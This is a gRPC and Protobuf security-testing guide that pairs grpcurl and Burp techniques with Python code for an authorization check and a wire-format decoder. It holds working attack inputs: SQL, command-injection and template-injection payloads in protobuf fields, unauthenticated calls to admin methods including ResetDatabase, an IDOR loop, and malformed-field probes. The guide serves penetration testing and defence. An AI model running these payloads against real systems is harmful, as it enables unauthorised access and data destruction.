
gRPC & Protobuf Security Testing

gRPC/Protobuf security testing: service reflection enumeration, Burp interception via HTTP/2 + grpc-web, field injection, deserialization attacks, authorization bypass, SQL injection in protobuf fields, and tooling (grpcurl, BloomRPC).

What is gRPC

gRPC is a high-performance RPC framework using HTTP/2 as transport and Protocol Buffers (protobuf) for serialisation. It’s increasingly common in microservices and mobile backends. Attack surface includes:

  • No schema exposure by default (unlike REST)
  • Binary serialisation (harder to inspect)
  • Authentication often only at the gateway
  • Unprotected reflection API (exposes schema)

Detection & Enumeration

Step 1 — Detect gRPC traffic

In Burp Proxy, look for:

  • Content-Type: application/grpc or application/grpc-web
  • HTTP/2 frames with binary bodies
  • Requests to paths like /ServiceName/MethodName

Standard ports: 443 (TLS), 50051 (dev), 80 (HTTP).

Step 2 — Enable gRPC reflection

gRPC servers with reflection enabled expose their full schema:

# List all services
grpcurl -plaintext TARGET:50051 list

# Describe a service
grpcurl -plaintext TARGET:50051 describe ServiceName

# Describe message types
grpcurl -plaintext TARGET:50051 describe ServiceName.RequestType

# List methods
grpcurl -plaintext TARGET:50051 list ServiceName

Step 3 — Call a method

# Simple call
grpcurl -plaintext -d '{"user_id": 1}' TARGET:50051 UserService/GetUser

# With auth header
grpcurl -plaintext -H 'Authorization: Bearer TOKEN' \
  -d '{"user_id": 1}' TARGET:50051 UserService/GetUser

# With TLS
grpcurl -insecure -d '{"user_id": 1}' TARGET:50051 UserService/GetUser

Intercept gRPC in Burp Suite

gRPC-Web (HTTP/1.1 or HTTP/2)

  1. Configure the app to use grpc-web protocol (wraps gRPC in HTTP/1.1).
  2. In Burp Proxy, enable HTTP/2 in the Proxy listener settings.
  3. Install Burp gRPC extension (BApp Store).
  4. The extension decodes protobuf binary bodies into readable JSON in the Inspector panel.

Manual decode

# Capture a gRPC message body and decode it (skip the 5-byte prefix: 1 compression flag + 4 big-endian length bytes)
# For application/grpc-web-text the body is base64-encoded, so base64-decode it before skipping the prefix;
# if the compression flag is 1, decompress per the grpc-encoding header before decoding
echo "BINARY_HEX" | xxd -r -p | tail -c +6 | protoc --decode_raw

Exploit 1: Injection in Protobuf Fields

Inject SQL, command, or XSS into string fields:

# SQL injection in a name field
grpcurl -plaintext -d '{"name": "admin'\''-- -"}' TARGET:50051 UserService/GetUserByName

# Command injection
grpcurl -plaintext -d '{"filename": "test; id #"}' TARGET:50051 FileService/ProcessFile

# SSTI
grpcurl -plaintext -d '{"template": "{{7*7}}"}' TARGET:50051 ReportService/GenerateReport

Burp approach

  1. Intercept a grpc-web request.
  2. In the gRPC Inspector pane, the protobuf is decoded to JSON.
  3. Modify the field value directly in the Inspector.
  4. Forward — Burp re-encodes to protobuf before sending.

Exploit 2: Missing Field Validation

Protobuf fields are identified by number (1, 2, 3…), not by name. A server's .proto often declares fields the client UI never sets (an internal is_admin flag, for example); if the handler trusts such a field from the request, the client can set it. Truly undeclared field numbers are retained as unknown fields and ignored by generated proto3 code, so the realistic target is a field that is declared on the server but missing from the client-facing documentation:

# Set is_admin (field 10) to true alongside the normal fields
# On the wire this is tag 0x50 (field 10, wire type 0 = varint) followed by 0x01
grpcurl -plaintext -d '{"user_id": 5, "is_admin": true}' TARGET:50051 UserService/GetUser
# grpcurl encodes the JSON against the reflected schema: if is_admin is not declared it errors out
# (-allow-unknown-fields makes it drop the field rather than send it), so an undeclared field
# has to be appended as raw bytes to the intercepted request body in Burp instead

Exploit 3: Authorization Bypass

Test each method without authentication:

# Remove the auth header and test privileged methods
grpcurl -plaintext -d '{"user_id": 1}' TARGET:50051 AdminService/ListUsers
grpcurl -plaintext -d '{}' TARGET:50051 AdminService/ResetDatabase

Test IDOR — change IDs:

for i in $(seq 1 20); do
  echo "Testing user_id=$i:"
  grpcurl -plaintext -H 'Authorization: Bearer LOW_PRIV_TOKEN' \
    -d "{\"user_id\": $i}" TARGET:50051 UserService/GetUser
done
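The server-side check that closes both probes above (unauthenticated calls to privileged methods, and the IDOR loop against GetUser), as an added example that is not part of the original page: every call is authenticated and authorised by method and by object, with default deny for any method the policy does not list. The token table, the POLICY dict, the method names and the use of gRPC status names as return values are all constructed for this example; in a real grpcio server this logic would live in a grpc.ServerInterceptor that aborts the call with the returned status, and the token lookup would be replaced by signature verification.

```python
from typing import Optional

# Constructed for this example: bearer token -> caller identity.
# A real service verifies a signed token (JWT, or an mTLS identity) instead of a lookup table.
TOKENS = {
    "LOW_PRIV_TOKEN": {"sub": 7, "roles": {"user"}},
    "ADMIN_TOKEN": {"sub": 1, "roles": {"admin"}},
}

# Constructed policy: full method name -> roles allowed. Anything not listed is denied,
# which in production also covers /grpc.reflection.v1alpha.ServerReflection/ServerReflectionInfo.
POLICY = {
    "/UserService/GetUser": {"user", "admin"},
    "/AdminService/ListUsers": {"admin"},
    "/AdminService/ResetDatabase": {"admin"},
}


def authenticate(metadata) -> Optional[dict]:
    """metadata is a list of (key, value) pairs, the shape grpc uses for invocation metadata.
    Returns the caller identity, or None when there is no usable bearer token."""
    auth = dict(metadata).get("authorization", "")
    scheme, _, token = auth.partition(" ")
    if scheme.lower() != "bearer" or not token:
        return None
    return TOKENS.get(token)


def authorize(method: str, metadata, request: Optional[dict] = None) -> str:
    """Return the gRPC status name an interceptor would abort the call with, or "OK"."""
    identity = authenticate(metadata)
    if identity is None:
        return "UNAUTHENTICATED"
    allowed = POLICY.get(method, set())          # default deny for unlisted methods
    if not identity["roles"] & allowed:
        return "PERMISSION_DENIED"
    # Object-level check (the IDOR case): a plain user may only fetch their own record.
    if method == "/UserService/GetUser" and "admin" not in identity["roles"]:
        if request is None or request.get("user_id") != identity["sub"]:
            return "PERMISSION_DENIED"
    return "OK"


if __name__ == "__main__":
    low = [("authorization", "Bearer LOW_PRIV_TOKEN")]
    print(authorize("/AdminService/ResetDatabase", []))                 # UNAUTHENTICATED
    print(authorize("/AdminService/ListUsers", low))                    # PERMISSION_DENIED
    for user_id in (7, 8):                                              # OK, then PERMISSION_DENIED
        print(user_id, authorize("/UserService/GetUser", low, {"user_id": user_id}))
```

The object-level check is the part most often missing in services that do authenticate: a valid low-privilege token proves who the caller is, not that they may read user_id=8. Running the IDOR loop from the cheat sheet against a server with this check returns PERMISSION_DENIED for every id except the caller's own.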

Exploit 4: Prototype/Type Confusion in Protobuf Parsing

Send the wrong wire type for a field (e.g., a length-delimited string where an int32 varint is declared):

# Field 1 expects an int32 (varint); build a length-delimited string instead
# Tag 0x0a = (field 1 << 3) | wire type 2; 0x05 = length; then "hello"
printf '\x0a\x05hello' > confused.bin
protoc --decode_raw < confused.bin   # confirms the bytes: 1: "hello"
# grpcurl -d only takes JSON or text-format input and encodes it against the declared
# schema, so it cannot send these bytes; paste them into the message body (after the
# 5-byte frame prefix) of an intercepted request in Burp Repeater instead

Some parsers coerce types, others throw unhandled exceptions revealing stack traces.
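To make the wire-level details behind the manual decode, Exploit 2 and Exploit 4 concrete, here is an added example (not from the original page, and not the protobuf library's own code): a minimal Protocol Buffers wire-format encoder and schema-less decoder in pure Python, plus the 5-byte gRPC framing and a strict schema check of the kind a server should apply. It shows what "field 10, varint, value 1" and the `\x0a\x05hello` probe look like as bytes, reproduces `protoc --decode_raw`, and handles the grpc-web-text base64 case. The GET_USER_REQUEST schema (field 1 user_id as int32, field 2 name as string) and all sample messages are constructed for this example.

```python
import base64

# Protobuf wire types (the low 3 bits of every tag)
VARINT, FIXED64, LENGTH_DELIM, FIXED32 = 0, 1, 2, 5


def encode_varint(n: int) -> bytes:
    """Base-128 varint: 7 bits per byte, least significant group first, high bit = continuation."""
    out = bytearray()
    while True:
        group, n = n & 0x7F, n >> 7
        if n:
            out.append(group | 0x80)
        else:
            out.append(group)
            return bytes(out)


def decode_varint(buf: bytes, pos: int):
    """Return (value, new_pos); refuses truncated input and varints longer than 10 bytes."""
    value, shift = 0, 0
    while True:
        if pos >= len(buf):
            raise ValueError("truncated varint")
        b = buf[pos]
        pos += 1
        value |= (b & 0x7F) << shift
        if not b & 0x80:
            return value, pos
        shift += 7
        if shift >= 70:
            raise ValueError("varint too long")


def encode_field(number: int, wire_type: int, value) -> bytes:
    """Encode one field: tag = (field_number << 3) | wire_type, then the payload."""
    tag = encode_varint((number << 3) | wire_type)
    if wire_type == VARINT:
        return tag + encode_varint(value)
    if wire_type == LENGTH_DELIM:
        return tag + encode_varint(len(value)) + bytes(value)
    raise NotImplementedError("only varint and length-delimited fields are encoded here")


def decode_raw(buf: bytes) -> list:
    """Schema-less parse, like `protoc --decode_raw`: [(field_number, wire_type, value), ...]."""
    pos, fields = 0, []
    while pos < len(buf):
        tag, pos = decode_varint(buf, pos)
        number, wire_type = tag >> 3, tag & 7
        if number == 0:
            raise ValueError("illegal field number 0")
        if wire_type == VARINT:
            value, pos = decode_varint(buf, pos)
        elif wire_type == LENGTH_DELIM:
            length, pos = decode_varint(buf, pos)
            if pos + length > len(buf):
                raise ValueError(f"field {number}: length {length} exceeds buffer")
            value, pos = buf[pos:pos + length], pos + length
        elif wire_type in (FIXED64, FIXED32):
            width = 8 if wire_type == FIXED64 else 4
            if pos + width > len(buf):
                raise ValueError(f"field {number}: truncated fixed{width * 8}")
            value, pos = int.from_bytes(buf[pos:pos + width], "little"), pos + width
        else:
            raise ValueError(f"field {number}: unsupported wire type {wire_type}")
        fields.append((number, wire_type, value))
    return fields


def grpc_frame(message: bytes, compressed: bool = False) -> bytes:
    """Length-prefixed gRPC message: 1 compression flag byte + 4-byte big-endian length + payload."""
    return bytes([int(compressed)]) + len(message).to_bytes(4, "big") + message


def unframe(body: bytes, content_type: str = "application/grpc") -> bytes:
    """Strip the 5-byte prefix; application/grpc-web-text bodies are base64-decoded first."""
    if content_type.endswith("-text"):
        body = base64.b64decode(body)
    if len(body) < 5:
        raise ValueError("body shorter than the 5-byte gRPC prefix")
    compressed, length = body[0], int.from_bytes(body[1:5], "big")
    if compressed:
        raise ValueError("compressed message: decompress per the grpc-encoding header first")
    if len(body) < 5 + length:
        raise ValueError("truncated message")
    return body[5:5 + length]


# Constructed schema for a hypothetical GetUserRequest: field 1 user_id (int32), field 2 name (string).
GET_USER_REQUEST = {1: ("user_id", VARINT), 2: ("name", LENGTH_DELIM)}


def check_against_schema(fields: list, schema: dict) -> list:
    """Strict checks a handler should make rather than relying on the generated parser:
    flag field numbers the schema does not declare, and declared fields whose wire type
    does not match the declared type."""
    problems = []
    for number, wire_type, _ in fields:
        if number not in schema:
            problems.append(f"unknown field {number}")
        elif schema[number][1] != wire_type:
            name, expected = schema[number]
            problems.append(f"field {number} ({name}) has wire type {wire_type}, expected {expected}")
    return problems


if __name__ == "__main__":
    msg = encode_field(1, VARINT, 5) + encode_field(10, VARINT, 1)   # user_id=5 plus field 10 = 1
    print(msg.hex(), decode_raw(msg), check_against_schema(decode_raw(msg), GET_USER_REQUEST))
    probe = b"\x0a\x05hello"                                          # field 1 as a string
    print(decode_raw(probe), check_against_schema(decode_raw(probe), GET_USER_REQUEST))
    print(unframe(base64.b64encode(grpc_frame(msg)), "application/grpc-web-text") == msg)
```

Two things worth noting from running it: the field-10 message decodes cleanly under decode_raw, so only a schema-aware check can tell that field 10 is undeclared; and the string-for-int32 probe is a wire-type mismatch, which is exactly why parser behaviour (coercion, silent drop, or an exception with a stack trace) differs between implementations.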


Tools

# grpcurl — gRPC curl
brew install grpcurl   # macOS
go install github.com/fullstorydev/grpcurl/cmd/grpcurl@latest

# BloomRPC — gRPC GUI client
# https://github.com/bloomrpc/bloomrpc

# Evans — interactive gRPC client with REPL
go install github.com/ktr0731/evans@latest
evans --host TARGET --port 50051 --reflection repl

# protoc — decode raw protobuf
# brew install protobuf

# Decode raw binary
protoc --decode_raw < binary_input.bin

Burp Suite workflow

  1. Proxy — enable HTTP/2; install gRPC BApp extension.
  2. Repeater — modify decoded protobuf fields in Inspector panel; re-encode on send.
  3. Intruder — fuzz field values with injection wordlists.
  4. Collaborator — inject SSRF payloads into URL-type fields; confirm with OOB callbacks.
  5. Scanner — active scan against grpc-web endpoints for injections.